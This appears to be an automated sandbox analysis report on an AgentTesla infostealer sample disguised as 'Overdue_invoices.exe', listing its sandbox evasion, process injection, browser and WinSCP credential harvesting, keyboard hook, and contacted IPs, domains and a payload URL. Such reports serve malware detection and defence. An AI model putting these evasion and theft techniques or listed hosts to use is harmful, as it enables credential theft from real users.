Source: C:\Users\user\Desktop\Overdue_invoices.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (this entry appears 2 times in the report)
Source: C:\Users\user\Desktop\Overdue_invoices.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Overdue_invoices.exe File read: C:\Windows\System32\drivers\etc\hosts (this entry appears 5 times in the report)
Source: Overdue_invoices.exe ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Users\user\Desktop\Overdue_invoices.exe 'C:\Users\user\Desktop\Overdue_invoices.exe'
Source: unknown Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Overdue_invoices.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Overdue_invoices.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Data Obfuscation:

.NET source code contains potential unpacker
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs .Net Code: OnResolveAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 0_2_004032DC push 280A0000h; ret 0_2_004032E1
Source: C:\Users\user\Desktop\Overdue_invoices.exe Code function: 1_2_00DB32DC push 280A0000h; ret 1_2_00DB32E1
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Window / User API: threadDelayed 1508 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\Desktop\Overdue_invoices.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 2140 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 3492 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99657s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -99063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Overdue_invoices.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Enables debug privileges
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Overdue_invoices.exe Memory written: C:\Users\user\Desktop\Overdue_invoices.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Process created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe Jump to behavior
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Overdue_invoices.exe, 00000001.00000002.625796287.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Users\user\Desktop\Overdue_invoices.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Overdue_invoices.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web data Jump to behavior
Source: C:\Users\user\Desktop\Overdue_invoices.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: Process Memory Space: Overdue_invoices.exe PID: 6020, type: MEMORY
Behavior Graph:

Behavior Graph ID: 344973
Sample: Overdue_invoices.exe
Startdate: 27/01/2021
Architecture: WINDOWS
Score: 100

Start node signatures:
  • Found malware configuration
  • Malicious sample detected (through community Yara rule)
  • Multi AV Scanner detection for submitted file
  • 6 other signatures

Process started: Overdue_invoices.exe (parent)
  • Contacted IP: 193.239.147.103, 49721, 80 DEDIPATH-LLCUS Brunei Darussalam
  • File dropped: C:\Users\user\...\Overdue_invoices.exe.log, ASCII
  • Signature: Injects a PE file into a foreign processes
  • Process started: Overdue_invoices.exe (child)

Child process Overdue_invoices.exe:
  • Contacted domain: raw.githubusercontent.com
  • Contacted IP: icanhazip.com 147.75.47.199, 49734, 80 PACKETUS Switzerland
  • 2 other IPs or domains
  • Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
  • Signature: Tries to harvest and steal browser information (history, passwords, etc)
  • Signature: Installs a global keyboard hook

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
193.239.147.103 | unknown | Brunei Darussalam | 35913 | DEDIPATH-LLCUS | false
147.75.47.199 | unknown | Switzerland | 54825 | PACKETUS | false
151.101.0.133 | unknown | United States | 54113 | FASTLYUS | false
108.177.119.109 | unknown | United States | 15169 | GOOGLEUS | false

Contacted Domains

Name | IP | Active
github.map.fastly.net | 151.101.0.133 | true
smtp.gmail.com | 108.177.119.109 | true
icanhazip.com | 147.75.47.199 | true
raw.githubusercontent.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://icanhazip.com/ | false | | high
http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html | false | Avira URL Cloud: safe | unknown